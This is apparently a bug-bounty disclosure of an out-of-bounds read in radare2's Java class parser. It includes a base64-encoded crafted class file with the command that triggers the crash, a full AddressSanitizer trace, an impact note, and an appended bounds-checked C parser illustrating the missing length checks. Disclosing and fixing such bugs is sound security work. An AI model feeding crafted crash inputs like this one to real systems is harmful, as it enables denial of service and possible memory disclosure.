Out-of-bounds Read in r_bin_java_bootstrap_methods_attr_new function in radareorg/radare2
Reported on
Apr 23rd 2022
- Description
An out-of-bounds (OOB) read vulnerability exists in the r_bin_java_bootstrap_methods_attr_new
function in Radare2 5.6.9.
This is similar to CVE-2022-0518 and CVE-2022-0521.
- Version
radare2 5.6.9 27745 @ linux-x86-64 git.conti
commit: 14189710859c27981adb4c2c2aed2863c1859ec5 build: 2022-04-23__11:05:49
- Proof of Concept
# build the radare2 with address sanitizer
./sys/sanitize.sh
echo yv66vgAAADQADQcACwcADAEADnZpcnR1YWxEYWNoaW5lAQAeKAdMY29tL3N1bi9qZGkvVmlydHVhbE1hY2hpbmU7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAAtNaXJyb3IuamF2YQEAEEJvb3RzdHJhcE1ldGhvZHMBABdGb3VuZF9ieV9naXRodWIvYmV0NGl0OwEAEmNv7S9zdW4vamRpL01pcnJvAQEAEGphdmEvbGFuZy9PYmplY3QGBQABAAIAAAAAAAIEAQADAAQAAAQBEgUABgAAAAIABwAAAAIACAAJAAAAAA== | base64 -d > bootstrap.class
ASAN_OPTIONS=detect_leaks=0:detect_odr_violation=0 r2 -A bootstrap.class
- ASAN
=================================================================
==608400==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000063cb7 at pc 0x7f5fffc53f0c bp 0x7fff215606c0 sp 0x7fff215606b0
READ of size 1 at 0x602000063cb7 thread T0
#0 0x7f5fffc53f0b in r_bin_java_bootstrap_methods_attr_new /src/radare2/shlr/java/class.c:6934
#1 0x7f5fffc04919 in r_bin_java_read_next_attr_from_buffer /src/radare2/shlr/java/class.c:2082
#2 0x7f5fffc041e5 in r_bin_java_read_next_attr /src/radare2/shlr/java/class.c:2043
#3 0x7f5fffc0816c in r_bin_java_parse_attrs /src/radare2/shlr/java/class.c:2247
#4 0x7f5fffc0a25e in r_bin_java_load_bin /src/radare2/shlr/java/class.c:2373
#5 0x7f5fffc099f2 in r_bin_java_new_bin /src/radare2/shlr/java/class.c:2323
#6 0x7f5fffc16be8 in r_bin_java_new_buf /src/radare2/shlr/java/class.c:3145
#7 0x7f5ff974a8d4 in load_buffer /src/radare2/libr/..//libr/bin/p/bin_java.c:81
#8 0x7f5ff9580989 in r_bin_object_new /src/radare2/libr/bin/bobj.c:149
#9 0x7f5ff95751c7 in r_bin_file_new_from_buffer /src/radare2/libr/bin/bfile.c:585
#10 0x7f5ff95301ca in r_bin_open_buf /src/radare2/libr/bin/bin.c:281
#11 0x7f5ff9531060 in r_bin_open_io /src/radare2/libr/bin/bin.c:341
#12 0x7f5ffba2dedd in r_core_file_do_load_for_io_plugin /src/radare2/libr/core/cfile.c:436
#13 0x7f5ffba30c1e in r_core_bin_load /src/radare2/libr/core/cfile.c:637
#14 0x7f6004a2fc10 in r_main_radare2 /src/radare2/libr/main/radare2.c:1206
#15 0x559df515e81b in main /src/radare2/binr/radare2/radare2.c:96
#16 0x7f6003e1a30f in __libc_start_call_main (/usr/lib/libc.so.6+0x2d30f)
#17 0x7f6003e1a3c0 in __libc_start_main@GLIBC_2.2.5 (/usr/lib/libc.so.6+0x2d3c0)
#18 0x559df515e1a4 in _start (/src/radare2/binr/radare2/radare2+0x21a4)
0x602000063cb7 is located 0 bytes to the right of 7-byte region [0x602000063cb0,0x602000063cb7)
allocated by thread T0 here:
#0 0x7f6005bb5fb9 in __interceptor_calloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x7f5fffc026a9 in r_bin_java_get_attr_buf /src/radare2/shlr/java/class.c:1963
#2 0x7f5fffc041a6 in r_bin_java_read_next_attr /src/radare2/shlr/java/class.c:2039
#3 0x7f5fffc0816c in r_bin_java_parse_attrs /src/radare2/shlr/java/class.c:2247
#4 0x7f5fffc0a25e in r_bin_java_load_bin /src/radare2/shlr/java/class.c:2373
#5 0x7f5fffc099f2 in r_bin_java_new_bin /src/radare2/shlr/java/class.c:2323
#6 0x7f5fffc16be8 in r_bin_java_new_buf /src/radare2/shlr/java/class.c:3145
#7 0x7f5ff974a8d4 in load_buffer /src/radare2/libr/..//libr/bin/p/bin_java.c:81
#8 0x7f5ff9580989 in r_bin_object_new /src/radare2/libr/bin/bobj.c:149
#9 0x7f5ff95751c7 in r_bin_file_new_from_buffer /src/radare2/libr/bin/bfile.c:585
#10 0x7f5ff95301ca in r_bin_open_buf /src/radare2/libr/bin/bin.c:281
#11 0x7f5ff9531060 in r_bin_open_io /src/radare2/libr/bin/bin.c:341
#12 0x7f5ffba2dedd in r_core_file_do_load_for_io_plugin /src/radare2/libr/core/cfile.c:436
#13 0x7f5ffba30c1e in r_core_bin_load /src/radare2/libr/core/cfile.c:637
#14 0x7f6004a2fc10 in r_main_radare2 /src/radare2/libr/main/radare2.c:1206
#15 0x559df515e81b in main /src/radare2/binr/radare2/radare2.c:96
#16 0x7f6003e1a30f in __libc_start_call_main (/usr/lib/libc.so.6+0x2d30f)
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/radare2/shlr/java/class.c:6934 in r_bin_java_bootstrap_methods_attr_new
Shadow bytes around the buggy address:
0x0c0480004740: fa fa fd fa fa fa fd fa fa fa 05 fa fa fa 00 07
0x0c0480004750: fa fa 05 fa fa fa fd fd fa fa 05 fa fa fa 00 01
0x0c0480004760: fa fa 05 fa fa fa fd fd fa fa 05 fa fa fa 00 03
0x0c0480004770: fa fa fd fd fa fa 05 fa fa fa 00 04 fa fa 05 fa
0x0c0480004780: fa fa 05 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa
=>0x0c0480004790: fa fa fd fd fa fa[07]fa fa fa fa fa fa fa fa fa
0x0c04800047a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==608400==ABORTING
- Impact
The bug causes the program to read data past the end of the intended buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash. For more details, see CWE-125: Out-of-bounds Read.
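As an added illustration (not radare2's code and not the fix the project shipped), the reader below walks the body of a JVM BootstrapMethods attribute while checking every field against the remaining buffer length, which is the check whose absence lets a parser run past a short attribute buffer like the 7-byte region in the ASAN report above. The byte strings are constructed for this example; the truncated one is sized to 7 bytes to mirror the report, and the layout follows the class file specification (JVMS §4.7.23).

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Bounds-checked cursor over an attribute body. Every read consults len,
 * so a truncated or lying attribute is rejected instead of read past. */
typedef struct {
    const uint8_t *p;
    size_t len;
    size_t off;
} Cursor;

/* Read a big-endian u2; return false if fewer than 2 bytes remain. */
static bool read_u2(Cursor *c, uint16_t *out) {
    if (c->len - c->off < 2) {
        return false;
    }
    *out = (uint16_t)(((uint16_t)c->p[c->off] << 8) | c->p[c->off + 1]);
    c->off += 2;
    return true;
}

/* BootstrapMethods attribute body (JVMS 4.7.23):
 *   u2 num_bootstrap_methods;
 *   { u2 bootstrap_method_ref;
 *     u2 num_bootstrap_arguments;
 *     u2 bootstrap_arguments[num_bootstrap_arguments]; } [num_bootstrap_methods]
 * Returns the number of methods parsed, or -1 if the body is truncated
 * (i.e. the declared counts do not fit in the bytes actually present). */
int parse_bootstrap_methods(const uint8_t *buf, size_t len) {
    Cursor c = { buf, len, 0 };
    uint16_t n_methods;
    if (!read_u2(&c, &n_methods)) {
        return -1;
    }
    for (uint16_t i = 0; i < n_methods; i++) {
        uint16_t ref, n_args;
        if (!read_u2(&c, &ref) || !read_u2(&c, &n_args)) {
            return -1;
        }
        /* Skip the argument indices only if all of them fit in the buffer. */
        size_t need = (size_t)n_args * 2;
        if (c.len - c.off < need) {
            return -1;
        }
        c.off += need;
    }
    return n_methods;
}

/* Constructed sample: one method with ref #5 and two arguments (#10, #11). */
static const uint8_t kValid[] = {
    0x00, 0x01,             /* num_bootstrap_methods = 1 */
    0x00, 0x05, 0x00, 0x02, /* ref = 5, num_args = 2 */
    0x00, 0x0a, 0x00, 0x0b  /* args = 10, 11 */
};

/* Constructed sample, 7 bytes long: declares two arguments but supplies
 * only one byte of them, so the second u2 would start at offset 6 and
 * touch offset 7, one byte past the end of the region. */
static const uint8_t kTruncated[] = {
    0x00, 0x01,
    0x00, 0x05, 0x00, 0x02,
    0x00
};

/* Constructed sample: zero methods is a valid, empty attribute. */
static const uint8_t kEmpty[] = { 0x00, 0x00 };

int main(void) {
    printf("valid:     %d\n", parse_bootstrap_methods(kValid, sizeof kValid));
    printf("truncated: %d\n", parse_bootstrap_methods(kTruncated, sizeof kTruncated));
    printf("empty:     %d\n", parse_bootstrap_methods(kEmpty, sizeof kEmpty));
    return 0;
}
```

The design point is that the length check is done before each field is read, using the size of the attribute buffer that was actually allocated rather than the counts found inside the data; a count-driven loop that trusts num_bootstrap_arguments is exactly what turns a 7-byte attribute into a heap-buffer-overflow read.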